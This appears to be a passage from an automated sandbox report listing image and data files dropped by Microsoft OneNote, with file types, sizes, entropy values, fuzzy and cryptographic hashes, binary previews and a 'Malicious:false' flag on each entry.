                                                                                                                                                                                                              Preview:./.C..vL....W"v_F.]....K...=.!.................?.....I...............................................................................................................h............................................H.!...F....hO.N...........3".nL...<................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):27862
                                                                                                                                                                                                              Entropy (8bit):7.238903610770013
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                                                                                                                              MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                                                                                                                              SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                                                                                                                              SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                                                                                                                              SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3555
                                                                                                                                                                                                              Entropy (8bit):7.686253071499049
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
                                                                                                                                                                                                              MD5:8A5444524F467A45A5A10245F89C855A
                                                                                                                                                                                                              SHA1:ACE68D567B02B68275E0345C86DB1139C0EC1386
                                                                                                                                                                                                              SHA-256:7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
                                                                                                                                                                                                              SHA-512:8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn*..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..|3.........................*Q..../c.....f.}8....D..|k..Z......0..~..c..e..m(...|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6519624224675566
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:RaVgYyfB3h1RRXUnfbrITgnlt9FFBl/FKVzVl/B1/tBRujlw//0lweI/Z/tjRujd:RaVgYyf9/UfomfFFBtcZtfMWf/BU
                                                                                                                                                                                                              MD5:55BDEA05C81220CFA7ACA368080F1335
                                                                                                                                                                                                              SHA1:A3FA85CAD331E2D7F053923B5C66F1DBC7712E3F
                                                                                                                                                                                                              SHA-256:7B7C76617ABAEFB9AE00A61E8E775126A17A0140D4E0059453A13BC657C26238
                                                                                                                                                                                                              SHA-512:79891AFB11F863C22A7BCBBF6CC2B167F581B350892E53A2F74F040567517A3F46EB540FB4DC1C2732CE9E1CCC08347FE0AC14229C4F75E96B47C2CFF6B544A3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_.4h.@.QJ...&$...................?.....I...............................................................................................................h............................................G..s..B..].EV...........g....SO....H..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6456665976562582
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:RaQyi6HTYyfB3h1RRXUnfBnHnFFBl/FKoxahRujlw//0lweI/aBRujd:Rag6HTYyf9/UfNnFFBtF3Wf/as
                                                                                                                                                                                                              MD5:EA8E23F810CA421833FA9AE0DDBD396D
                                                                                                                                                                                                              SHA1:AC086D619F9F38C32B83103096133597A3B186DE
                                                                                                                                                                                                              SHA-256:FDF3B229E39F9ABAE9AB6686E1CF5D720E75DA4ADA4964D394DA6956A6A48B80
                                                                                                                                                                                                              SHA-512:FF8A76E6518F2CD4814EB42988B71642092529A90D2438775CE56C9D0E6309E5A58F78164FEEBA811FE2A072B58094BE7AB4466AD5C99CB6825027081C967335
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_....M.nE.W....."................?.....I...............................................................................................................h............................................_...l.K....#^.T........l=B.2.jO..x................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 77 x 627, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5136
                                                                                                                                                                                                              Entropy (8bit):7.622045262603241
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
                                                                                                                                                                                                              MD5:FA38AFA965141EA3F17863EE8DCCDE61
                                                                                                                                                                                                              SHA1:2B4611E651AF7549C1AA73932B1136B561A7602F
                                                                                                                                                                                                              SHA-256:E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
                                                                                                                                                                                                              SHA-512:A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):41893
                                                                                                                                                                                                              Entropy (8bit):7.52654558351485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                                                                                                                              MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                                                                                                                              SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                                                                                                                              SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                                                                                                                              SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.650884744262954
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:RazGkEGS7lFYyfB3h1RRXUnf9BOd/jPvnFFBl/FK573dLBRujlw//0lweI/aKLjm:RazmPYyf9/Uf9inFFBt6R2Wf/aSq
                                                                                                                                                                                                              MD5:335B15CDC37A89B32943ECB3815317AA
                                                                                                                                                                                                              SHA1:A1B0B517047D51F23AB2D72FA613CAB1DBBB13DF
                                                                                                                                                                                                              SHA-256:94BB2BE66D3CD518B34AFBDD0D07D74D0CBECB31BC53853A958769157C528EF8
                                                                                                                                                                                                              SHA-512:425175C2FACD62D13369DE080F4E0E554B14BE5001C46660C310C6557F2E8E1ED5DC76E59D5C75CBF569E4B9B7185B1FCAFE44F9C7C12665AF6E255A09B47F00
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_mq.....H.c.cw._.................?.....I...............................................................................................................h...........................................e;F.8.9M.n...Q..........n..r..F...#}.+z............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):22203
                                                                                                                                                                                                              Entropy (8bit):6.977175130747846
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                                                                                                                              MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                                                                                                                              SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                                                                                                                              SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                                                                                                                              SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6458198724014357
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:RapAToTYyfB3h1RRXUnflasbCKrFFBl/FKrBCgtBRujlw//0lweI/WgtjRujd:RapLTYyf9/UflaQFFBtGh2Wf/1q
                                                                                                                                                                                                              MD5:248871C2DDF440D316128D5B1CAF6A42
                                                                                                                                                                                                              SHA1:63229F1A4F3604140405A7D3E354E0F881B444F6
                                                                                                                                                                                                              SHA-256:A4D7840BAE3896DB4B7FCA8803D9076B7B266F9DA24128090FEC3F0E6B2674B1
                                                                                                                                                                                                              SHA-512:BC6C198C01F650A63FC2BD97B49AB4DDF76DF824B2F242B92FAEDD0E045925D1C34F636FE6AD20E937B5566547E3CD3A85E333FFBA30B89E32F214B78F7F1F7A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_.C.z...K......o.................?.....I...............................................................................................................h...........................................P....pH....^<'.........u...EI.v@`................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11040
                                                                                                                                                                                                              Entropy (8bit):7.929583162638891
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
                                                                                                                                                                                                              MD5:02775A1E41CF53AC771D820003903913
                                                                                                                                                                                                              SHA1:2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
                                                                                                                                                                                                              SHA-256:83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
                                                                                                                                                                                                              SHA-512:5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15740
                                                                                                                                                                                                              Entropy (8bit):6.0674556182683945
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                                                                                                                              MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                                                                                                                              SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                                                                                                                              SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                                                                                                                              SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):109698
                                                                                                                                                                                                              Entropy (8bit):7.954100577911302
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
                                                                                                                                                                                                              MD5:8D804A60E86627383BED6280ED62F1CF
                                                                                                                                                                                                              SHA1:E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
                                                                                                                                                                                                              SHA-256:494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
                                                                                                                                                                                                              SHA-512:0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..|....n...o....`.nk.#.%x......-|...|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6986984342169061
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HW1ebYyfh3h1LC6LIKXUnf8afKXFFBl/FKLybNBsr0NBsXBRuj8lvClax/mRNBs6:HkebYyfdLCmUf+FFBtJ80QDV/x/mRQq
                                                                                                                                                                                                              MD5:039AB042039E1B390B87D9C53D625C80
                                                                                                                                                                                                              SHA1:CCEBD0F0AC997EA6F36F456A5155777C250EB46D
                                                                                                                                                                                                              SHA-256:D809F8985B6C9324018DD265E62539D576B6E33AE5A66D76B41DBD4EB8D09DBE
                                                                                                                                                                                                              SHA-512:A6BB9B0586129CE4DC0719832367D21768CE27D1D1EEFAD69A0A9002898071A69B29A9A9899C625F1453DE43B055E6941AA48F5B9DA1C80BDB1387DF88CC9917
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.R\{..M..Sx.)..g)O...aI........................?.....I.......*...*...*...*...................................................F(_.k.-@....?&..0.......................h............................................b.l...K.^....<W........$..W.q.D.._.D.0V............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):70028
                                                                                                                                                                                                              Entropy (8bit):7.742089280742944
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
                                                                                                                                                                                                              MD5:EC7811912ACA47F6AEB912469761D70D
                                                                                                                                                                                                              SHA1:C759BC2D908705D599B03BDB366C951B11F99A4E
                                                                                                                                                                                                              SHA-256:FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
                                                                                                                                                                                                              SHA-512:881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):27862
                                                                                                                                                                                                              Entropy (8bit):7.238903610770013
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                                                                                                                              MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                                                                                                                              SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                                                                                                                              SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                                                                                                                              SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12824
                                                                                                                                                                                                              Entropy (8bit):7.974776104184905
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                                                                                              MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                                                                                              SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                                                                                              SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                                                                                              SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                                                                                              Malicious:false
